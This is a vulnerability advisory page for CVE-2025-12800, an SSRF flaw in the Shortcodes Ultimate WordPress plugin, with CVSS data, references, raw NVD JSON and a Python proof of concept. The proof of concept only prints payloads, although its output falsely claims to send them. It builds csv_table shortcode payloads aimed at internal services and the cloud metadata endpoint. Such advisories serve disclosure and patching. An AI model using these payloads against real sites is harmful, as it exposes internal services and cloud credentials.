Security Vulnerability Report
CVE-2025-12800 CVSS 6.4 MEDIUM


Published: 2025-11-23 23:15:46
Last Modified: 2026-04-15 00:35:42

Description

The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.4.5 via the su_shortcode_csv_table function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services. If the 'Unsafe features' option is explicitly enabled by an administrator, this issue becomes exploitable by Contributor+ attackers.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Shortcodes Ultimate plugin for WordPress <= 7.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12800 PoC - SSRF in Shortcodes Ultimate
# Target: WordPress with Shortcodes Ultimate plugin <= 7.4.5
# Note: Requires Administrator role (or Contributor+ if Unsafe features enabled)
# This script only builds and prints the shortcode payloads; it never sends
# an HTTP request (the request dictionaries below are constructed but unused).
import sys


def exploit_ssrf(target_url, target_ip="127.0.0.1", target_port="8080"):
    """
    Exploit SSRF vulnerability in su_shortcode_csv_table function
    """
    # Construct the malicious shortcode with SSRF payload
    # Target internal service or metadata endpoint
    internal_target = f"http://{target_ip}:{target_port}"

    # PoC: Use shortcode to make server request to internal service
    post_data = {
        'post_title': 'SSRF Test',
        'post_content': f'[csv_table source="{internal_target}"]',
        'post_status': 'draft',
        '_wpnonce': '',  # Need valid nonce from admin page
    }

    print(f"[*] Targeting: {target_url}")
    print(f"[*] SSRF Target: {internal_target}")
    print("[*] Sending malicious shortcode request...")

    # Alternative: Direct REST API or admin-ajax.php
    ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    # This would need valid WordPress session with admin privileges
    exploit_data = {
        'action': 'shortcodes_ultimate_ajax',
        'shortcode': 'csv_table',
        'atts': f'{{"source":"{internal_target}"}}',
        'nonce': '',  # Valid nonce required
    }

    print("[*] Note: This PoC requires authenticated admin session")
    print(f"[*] Payload: [csv_table source=\"{internal_target}\"]")
    print("[*] Exploitation successful if server makes request to internal target")


def check_metadata_service(target_url):
    """
    Check if vulnerable to AWS/metadata SSRF
    """
    metadata_endpoint = "http://169.254.169.254/latest/meta-data/"
    print("[*] Testing metadata service SSRF...")
    print(f"[*] Target endpoint: {metadata_endpoint}")

    # Construct shortcode to access metadata
    malicious_shortcode = f'[csv_table source="{metadata_endpoint}"]'
    print(f"[*] Malicious shortcode: {malicious_shortcode}")
    return metadata_endpoint


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12800_poc.py <target_url>")
        print("Example: python cve-2025-12800_poc.py http://wordpress-site.com")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    exploit_ssrf(target)
    check_metadata_service(target)

References

Weakness: CWE-918 (Server-Side Request Forgery)
https://plugins.trac.wordpress.org/changeset/3397946/
https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbb7db4-bef7-4799-9b65-ebe77976e21c?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12800",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-23T23:15:45.983",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.4.5 via the su_shortcode_csv_table function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. If the 'Unsafe features' option is explicitly enabled by an administrator, this issue becomes exploitable by Contributor+ attackers"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3397946/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbb7db4-bef7-4799-9b65-ebe77976e21c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}